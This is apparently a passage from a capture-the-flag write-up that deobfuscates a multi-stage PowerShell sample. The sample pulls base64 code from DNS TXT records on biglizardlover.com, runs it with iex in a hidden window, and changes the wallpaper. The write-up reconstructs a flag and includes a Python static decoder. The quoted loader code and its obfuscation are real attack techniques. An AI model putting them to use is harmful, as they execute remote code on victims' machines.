 ('owYHO9(SeT-varIABLE  hWRof'+'ShWR  hWRhWR ) owY +[STriNg]( hWR90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W'+'72B72j65O79j66W90'+'C13j16<13j68W72g85B13<5W118W126O84<94'+'U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121'+'%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-'+'3B110B66g67g9'+'1j72B95U89W112O23%23<10'+'7'+'W95j'+'66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C9'+'4W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-'+'89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<1'+'04'+'U85O93W76<67g73j125j95j66<93B7'+'2C95<89<84U13O126-89g95g68C'+'67C74<94W4B4U4B4%39-13%13<13O13B'+'9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16'+'g13-103j66U68-67<0U12'+'5O76B89j69-1'+'3C9W'+'72<67C91<23U121%104j96j125j13g15<65B'+'68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79'+'B68U'+'94U78<88U68g89g95'+'%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C6'+'7%73%66j64g13B'+'0W96B68O67C68U64U'+'88B64O13j28B13C0'+'g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j8'+'4<75<72<76g94%89'+'j93<76B95<89j84'+'-13C16%13-15<69<89j89U93-94j23%2j2'+'<79g68j74j65B68'+'O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87'+'B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13'+'j0<98W88-89g107j68O'+'65g72B'+'13-9<89U90C'+'68W65j68%74%69<89'+'-73C72<93U'+'72C67<73B13g0U104g95<95j66U95O108g78g8'+'9<68U66%67U13<126%68B65O72<67-8'+'9-6'+'5g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B'+'88%65j65g39<13g13B13C13B108%7'+'3<7'+'3U0g121%84j93O72%13j0-1'+'21<84g93B72O105<72C75<68U67B68g89O68<6'+'6j67U13O15O88O94'+'O68g67C74C13U126-84'+'U94O89<72B64U22B13'+'U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j
72C95g66O93<126B72C9'+'5<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g'+'64g93%66W95-89-5g77U15O8'+'8-94<72j9'+'5-30<31'+'g3%73U65C65j77-15W4C112B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13'+'O72W85j89U72B95W67U13B79j'+'66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O9'+'5U94W100<67-75W66%5B68C67B89j13O8'+'8C10'+'8-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W'+'122j68j67B100C6'+'7U68<4%22B13-80W15-22W13<118-1'+'22'+'W112C23g23g126-84W94'+'B89W72j64j125g76-95%76B'+'64C72g89O72O95U9'+'4j100%67%'+'75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B7'+'3W72<93C72g67j73B'+'1W28U6-31-4-13<'+'81C13C98'+'C'+'88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j'+'78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67'+'j89W97g68'+'C9'+'4-89B1'+'3O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13'+'C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89'+'g13j16%13-15C122O64W28O25O76C107<66%87U'+'78%87g'+'99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j'+'69g125U127B106-94<20B15-3'+'9hWR-SPlIT hWRohWR -SPLIThWR<h'+'WR-SplIThWR%hWR-SplIthWRwhWR-SPLIThWR'+'BhWR -SPLIThWRJ'+'hWR-spliTh'+'WR-hWR-S'+'pL'+'it hWRchWR-SPlIT hWRUhWR -spLIThWRghWRIhU fOREach{[c'+'Har]( HO9_ -bXoRhWR0x2dhWR)'+'}) +owY HO9(sEt-ITEM hWRvariaBlE:oFshWR hWR hWR ) owY'+' I'+'hU&( (['+'STRing]HO9verBOsEPREference)[1,3]+hWRXhWR-jOInhWRhWR)').REpLaCe('owY',[strinG][chAr]34).REpLaCe(([chAr]72+[chAr]79+[chAr]57),'$').REpLaCe(([chAr]73+[chAr]104+[chAr]85),'|').REpLaCe(([chAr]104+[chAr]87+[chAr]82),[strinG][chAr]39) |&( $pSHoME[21]+$PSHOmE[34]+'X')

Another round! Replace &( $pSHoME[21]+$PSHOmE[34]+'X') at the end with Write-Output. Just another stage:

"$(SeT-varIABLE  'ofS'  '' ) " +[STriNg]( '90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W72B72j65O79j66W90C13j16<13j68W72g85B13<5W118W126O84<94U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-3B110B66g67g91j72B95U89W112O23%23<107W95j66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C94W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<104U85O93W76<67g73j125j95j66<93B72C95<89<84U13O126-89g95g68C67C74<94W4B4U4B4%39-13%13<13O13B9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16g13-103j66U68-67<0U125O76B89j69-13C9W72<67C91<23U121%104j96j125j13g15<65B68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79B68U94U78<88U68g89g95%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C67%73%66j64g13B0W96B68O67C68U64U88B64O13j28B13C0g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j84<75<72<76g94%89j93<76B95<89j84-13C16%13-15<69<89j89U93-94j23%2j2<79g68j74j65B68O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13j0<98W88-89g107j68O65g72B13-9<89U90C68W65j68%74%69<89-73C72<93U72C67<73B13g0U104g95<95j66U95O108g78g89<68U66%67U13<126%68B65O72<67-89-65g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B88%65j65g39<13g13B13C13B108%73<73U0g121%84j93O72%13j0-121<84g93B72O105<72C75<68U67B68g89O68<66j67U13O15O88O94O68g67C74C13U126-84U94O89<72B64U22B13U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j72C95g66O93<126B72C95<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g64g93%66W95-89-5g77U15O88-94<72j95-30<31g3%73U65C65j77-15W4C11
2B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13O72W85j89U72B95W67U13B79j66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O95U94W100<67-75W66%5B68C67B89j13O88C108-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W122j68j67B100C67U68<4%22B13-80W15-22W13<118-122W112C23g23g126-84W94B89W72j64j125g76-95%76B64C72g89O72O95U94j100%67%75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B73W72<93C72g67j73B1W28U6-31-4-13<81C13C98C88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67j89W97g68C94-89B13O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89g13j16%13-15C122O64W28O25O76C107<66%87U78%87g99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j69g125U127B106-94<20B15-39'-SPlIT 'o' -SPLIT'<'-SplIT'%'-SplIt'w'-SPLIT'B' -SPLIT'J'-spliT'-'-SpLit 'c'-SPlIT 'U' -spLIT'g'| fOREach{[cHar]( $_ -bXoR'0x2d')}) +" $(sEt-ITEM 'variaBlE:oFs' ' ' ) " |&( ([STRing]$verBOsEPREference)[1,3]+'X'-jOIn'')

which renders as:

 while ($true) {
    $glideelbow = iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Resolve-DnsName VFdWbllVSnZibXM9.biglizardlover.com -Type txt | Select-Object -ExpandProperty Strings))))
    $twilightdepend = Join-Path $env:TEMP "lizard.jpg"
    $biscuitrecognize = Get-Random -Minimum 1 -Maximum 25
    $galaxyfeastparty = "https://biglizardlover.com/img/lizard$biscuitrecognize.jpg"
    Invoke-WebRequest $galaxyfeastparty -OutFile $twilightdepend -ErrorAction SilentlyContinue | Out-Null
    Add-Type -TypeDefinition "using System; using System.Runtime.InteropServices; public class W { [DllImport(`"user32.dll`")] public static extern bool SystemParametersInfo(int uAction,int uParam,string lpvParam,int fuWinIni); }"; [W]::SystemParametersInfo(20,0,$twilightdepend,1+2) | Out-Null
    Start-Process powershell -ArgumentList '-Command', $glideelbow -WindowStyle Hidden
}
$objectTest = "Wm14aFozczNOak0wTWpZNVlXVmhPRGs9"

First, the variable objectTest is a part of our flag: it decodes from base64 (two passes) to flag{7634269aea89.

This payload requests the TXT record of VFdWbllVSnZibXM9.biglizardlover.com, base64-decodes the answer and executes it with iex. Let’s query it ourselves:

dig txt VFdWbllVSnZibXM9.biglizardlover.com
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.10.6 <<>> txt VFdWbllVSnZibXM9.biglizardlover.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30548
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;VFdWbllVSnZibXM9.biglizardlover.com. IN        TXT

;; ANSWER SECTION:
VFdWbllVSnZibXM9.biglizardlover.com. 300 IN TXT "JiAoICRWZXJib3NlcHJlRmVyZW5DZS50T3NUcmluRygpWzEsM10rJ1gnLWpPSW4nJykgKG5lVy1vYmpFQ3QgaW8uU3RSRUFtckVhRGVyKChuZVctb2JqRUN0IFN5c3RlTS5JTy5jT01QUmVTU2lPbi5kZWZsYVRlc3RSZWFtKCBbU3lzdEVtLmlPLm1FbW9yWVN0ckVhTV0gW0NPblZFUlRdOjpGUm9NQmFzZTY0c1RyaU5HKCdqVkpkYzZwSUV" "QMHJVN2RTdDZGR0NhQVJjV3NmVUNjcUlCcG0vSWdVRDRoRWlTSUd2TWFQOHI5dnRadmE1MzJabXVtZTdqNTl6bm1LaC9hMXAvNU5mc215V1F1TGFOTUpLblZkKzdrMWZrS3ZWUm5rTzFEUWdjSnRmdGR2Tkt4cFFUZDFkMnpETWFGaWdvYVBtSnRzK1AwUklFQkJJci9KWGJ2SlVuY1BGQktna0l0dWxQaUtMS2VEVGhtMVd1RjZQK2lPZ0VLOH" "g3UWlnTUtjQVFXaEFJVXNFUndvdkpjQmRxdkljc2t4NTQrenZNTzZyVmJJVmpsUUdIcDV5a3Vnd1B3eFBrY2RiTFhQMDdKTWlnTkdnTUlvVmtZRG9CQlVaSExYYjFhOWRnVUtUYWVuK2FiNmFUU0F3cXo0OGhQMUdqbUY1dUowdzNYOGw3bUduYU0wejl0QW9kdkh3NkMybXI0Y2JjTndjWDdEOHZ5bFMwZXpEUUlmVS95VDF1cXZPSGxkQndvc" "lpHbUNIS3k4YXpxZkcwMnMrc0JsdS9oM1htenE5U2xRTURIeHZOU2ZPMmRzcFdIUzIyd3o3TGhpQzlYRkhxTllqeEVTVU1CMU5XZDRjTTZOcG04UHJmNEVLTlN0MSsvdktSS1ZacHl6eG9hL21FRGhFUDhnMllrYTQ0THQ5S2gvV3VCVTFZNE80NlAvZmVGbmo3OEJoVVhNa01JSUpiRk1JMGFRNXNSQktZRENZTzFoMHNWdGw5dkU2R1ZmZ3dH" "aWNSeUIyMnJUMkRPdXpTTlNPUFJPYUowWXVaaTZzelI2NXMvYXRyMndlOGI1N2Rod3NPZkx2OHBOek5tMjhON2FMRGVhdlh6eGRxVUxKQ2lySVNYRzFmb2NxdjFHKzh2UlRZb1FiVytxbStwVzg1WUw4UWVKU3Q0WERtYm1BaWRQSnM0eXNvSENlamJHdDdwRitiNmpUbTk3QVFyME5FZFRNTXR1Um1Qei9lT3UzeVQ4dkUvUlg2TEVQUnFNNDF" "idExQZGZXNjFRRk1uSkczVUNFZzZ0aHdzRnYvZ294NUJseWloVmhzaVdRTE5jOEFpSWxGbk1QNktCRTJIdFBsZ1hMWTNVb1RFWmxoNFFReDRyK1VCNW9CSGxwU1FpWnA5THRGVjFocVdvT0pFa0g3dXZMT1puRnQ1OHdSOHoyYkY4NTBTZ3RQOVZKWHNpRVpBa0loRVpZSi9tZGhYbVFNTmFSUXRrRnUrVEl2bElpa1BDUjIwL21UNkZheTh0am" "1VZ0VVa2h2OGhmNURlUnlGTzVTWGE3d1NyUVF2ckVIL2R1b05WQ0NtZVFwWUNMSXZYV1lhdjFtUTg4Q1lCVWlFUklqeDJySjh0UG83YkxDSkdna3dHRlR4UnJyWUlzSzZmSW5iQ0FWSW1tS0tRcS9kOEt4VTMydldOZkRva3NrMzhBJyksW1NZU1RFbS5JTy5jT21wUkVzU0lvbi5Db01wUmVTU2lvbm1vREVdOjpkRUNvbVByZVNTKSkgLCBbd" "EV4VC5lbmNPZGluZ106OmFzY0lpKSApLnJFQURUb2VORCggKSAK"

;; Query time: 1561 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Sat Nov 01 16:28:07 CET 2025
;; MSG SIZE  rcvd: 1920

After decoding the base64:

& ( $VerbosepreFerenCe.tOsTrinG()[1,3]+'X'-jOIn'') (neW-objECt io.StREAmrEaDer((neW-objECt SysteM.IO.cOMPReSSiOn.deflaTestReam( [SystEm.iO.mEmorYStrEaM] [COnVERT]::FRoMBase64sTriNG('jVJdc6pIEP0rU7dSt6FGCaARcWsfUCcqIBpm/IgUD4hEiSIGvMaP8r9vtZva532Zmume7j59znmKh/a1p/5NfsmyWQuLaNMJKnVd+7k1fkKvVRnkO1DQgcJtftdvNKxpQTd1d2zDMaFigoaPmJts+P0RIEBBIr/JXbvJUncPFBKgkItulPiKLKeDThm1WuF6P+iOgEK8x7QigMKcAQWhAIUsERwovJcBdqvIcskx54+zvMO6rVbIVjlQGHp5ykugwPwxPkcdbLXP07JMigNGgMIoVkYDoBBUZHLXb1a9dgUKTaen+ab6aTSAwqz48hP1GjmF5uJ0w3X8l7mGnaM0z9tAodvHw6C2mr4cbcNwcX7D8vylS0ezDQIfU/yT1uqvOHldBworZGmCHKy8azqfG02s+sBlu/h3Xmzq9SlQMDHxvNSfO2dspWHS22wz7LhiC9XFHqNYjxESUMB1NWd4cM6Npm8Prf4EKNSt1+/vKRKVZpyzxoa/mEDhEP8g2Yka44Lt9Kh/WuBU1Y4O46P/feFnj78BhUXMkMIIJbFMI0aQ5sRBKYDCYO1h0sVtl9vE6GVfgwGicRyB22rT2DOuzSNSOPROaJ0YuZi6szR65s/atr2we8b57dhwsOfLv8pNzNm28N7aLDeavXzxdqULJCirISXG1focqv1G+8vRTYoQbW+qm+pW85YL8QeJSt4XDmbmAidPJs4ysoHCejbGt7pF+b6jTm97AQr0NEdTMMtuRmPz/eOu3yT8vE/RX6LEPRqM41btLPdfW61QFMnJG3UCEg6thwsFv/gox5BlyihVhsiWQLNc8AiIlFnMP6KBE2HtPlgXLY3UoTEZlh4QQx4r+UB5oBHlpSQiZp9LtFV1hqWoOJEkH7uvLOZnFt58wR8z2bF850SgtP9VJXsiEZAkIhEZYJ/mdhXmQMNaRQtkFu+TIvlIikPCR20/mT6Fay8tjmUgEUkhv8hf5DeRyFO5SXa7wSrQQvrEH/duoNVCCmeQpYCLIvXWYav1mQ88CYBUiERIjx2rJ8tPo7bLCJGgkwGFTxRrrYIsK6fInbCAVImmKKQq/d8KxU32vWNfDoksk38A'),[SYSTEm.IO.cOmpREsSIon.CoMpReSSionmoDE]::dEComPreSS)) , [tExT.encOding]::ascIi) ).rEADToeND( ) 
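Both this TXT-delivered stage and the earlier io.compression.DeflateStream stage use the same wrapping, base64 around a raw DEFLATE stream, so one static decoder serves both. The Python sketch below is an added example, not part of the original write-up; build_sample() constructs a harmless dig-style answer (hypothetical name stage.example.) so that it runs offline.

```python
import base64
import re
import zlib

MAX_OUTPUT = 1 << 20  # refuse to inflate more than 1 MiB from one layer
B64_ARG_RE = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'", re.I)
TXT_CHUNK_RE = re.compile(r'"([^"]*)"')


def txt_to_script(dig_answer: str) -> str:
    """Join the quoted character-strings of a dig TXT answer and base64-decode them.

    A TXT record carries strings of at most 255 bytes each, which is why dig
    prints the payload as several quoted chunks.
    """
    joined = "".join(TXT_CHUNK_RE.findall(dig_answer))
    return base64.b64decode(joined, validate=True).decode("ascii")


def inflate_layer(script: str) -> str:
    """Decode a FromBase64String('...') literal fed to DeflateStream, without running it."""
    match = B64_ARG_RE.search(script)
    if match is None:
        raise ValueError("no FromBase64String literal found")
    raw = base64.b64decode(match.group(1), validate=True)
    # .NET DeflateStream reads raw DEFLATE (RFC 1951), no zlib/gzip header: wbits=-15.
    inflater = zlib.decompressobj(-15)
    body = inflater.decompress(raw, MAX_OUTPUT)
    if inflater.unconsumed_tail:
        raise ValueError("layer inflates past MAX_OUTPUT")
    return body.decode("ascii", errors="replace")


def build_sample() -> str:
    """Constructed dig-style answer wrapping a harmless inner script the same way."""
    inner = "Write-Output 'constructed inner stage'"
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(deflater.compress(inner.encode()) + deflater.flush()).decode()
    stage = ("(neW-objECt io.StREAmrEaDer((neW-objECt SysteM.IO.cOMPReSSiOn.deflaTestReam("
             "[SystEm.iO.mEmorYStrEaM][COnVERT]::FRoMBase64sTriNG('" + blob + "'),"
             "[SYSTEm.IO.cOmpREsSIon.CoMpReSSionmoDE]::dEComPreSS)),"
             "[tExT.encOding]::ascIi)).rEADToeND()")
    outer = base64.b64encode(stage.encode()).decode()
    chunks = [outer[i:i + 255] for i in range(0, len(outer), 255)]
    return "stage.example. 300 IN TXT " + " ".join('"%s"' % c for c in chunks)


if __name__ == "__main__":
    answer = build_sample()
    stage = txt_to_script(answer)
    print(stage[:60] + "...")
    print(inflate_layer(stage))
```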

We can decode the payload (again):

$cMJzG0= "))93]rahC[,421]rahC[,63]rahC[F-)')}'+'2'+'{X}2{+]31[DiLlEhS}'+'0'+'{+]1[DiLLehS}0'+'{ '+'( & }1{)(Dn'+'e'+'oTDaeR.))iICsa::]gnIDO'+'cne'+'.T'+'XE'+'T.'+'meTS'+'Ys[ '+',))sSE'+'RPmoCED::]Edo'+'MNoiSs'+'ERP'+'MOC'+'.noisserp'+'M'+'Oc.OI'+'[,) }2{A43z'+'8KG1R90j76'+'WrqRe0zaKr1L'+'m7LKR5X1s'+'aiooB'+'DH'+'D7+J0i5tJ77Lo'+'6ANRbL+OWh'+'TP+H'+'i34F'+'Mg4'+'d'+'0Un'+'dNziXX78'+'6fT'+'D'+'iXrh44V'+'98'+'/b2/Cx'+'T1'+'iNhkmH'+'dEZ0Ln'+'Oc2c'+'a'+'P'+'1KMpKx68RJMAHU'+'4AFwwVE'+'imSSE6hS59'+'pc'+'d'+'lT3ESTEl2aHvZV'+'0JapPtRwySxNSQ'+'ZcEC'+'ae'+'A97cD'+'9UK'+'Y'+'IgN'+'aLh'+'bke7GmqIIa'+'KKT4'+'1VcN7z8t'+'mMNv'+'2cF'+'VLWia/S/1kBZJG7xQt6KK'+'5'+'ERPU9WkrNQBEo78GoZQz+ZT'+'m3'+'/7zAjM0H6BqK29+'+'ZJNV290k1NbZTu1'+'eYZK+'+'XTt'+'UUKbaJ'+'gWPt'+'0kB'+'waCGky'+'+vXM'+'EAJ8aP9Yf}2{('+'gni'+'RTs4'+'6ESa'+'BmoRF::]TrevNOC[ ]MAE'+'RTSyR'+'OMEm.Oi.Me'+'Ts'+'ys'+'[ (mAERtS'+'eTAlfED.'+'N'+'oissER'+'pM'+'oc.oI.M'+'ETsys TcEjbo'+'-W'+'en'+' ((Re'+'dAERmAe'+'RTS.Oi.MEtsYS Tc'+'Ejbo'+'-Wen ( '(( ( )''nioJ-'X'+]3,1[)EcnereferpeSOBReV$]gNirts[( (. " ; & ( $shellId[1]+$ShellID[13]+'x')([STriNg]::joIN('' , (  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE[ - 1.. -((  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE.LenGtH)] )) 

which renders as:

Add-Type -AssemblyName System.Speech; Add-Type -AssemblyName System.Windows.Forms
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice('Microsoft Zira Desktop')
$lizard = Get-Date -Format tt
while ($true) {
    $SpeechSynth.Speak($lizard)
    [System.Windows.Forms.MessageBox]::Show($lizard, 'Alert', 'OK', 'Information')
}
$UniqueRebel = "TWpVeU9UWXlORGN3ZlE9PQ=="

And we get our final part: TWpVeU9UWXlORGN3ZlE9PQ==, which decodes from base64 (two passes) to 252962470}

Final flag: flag{7634269aea89c0434d59028252962470}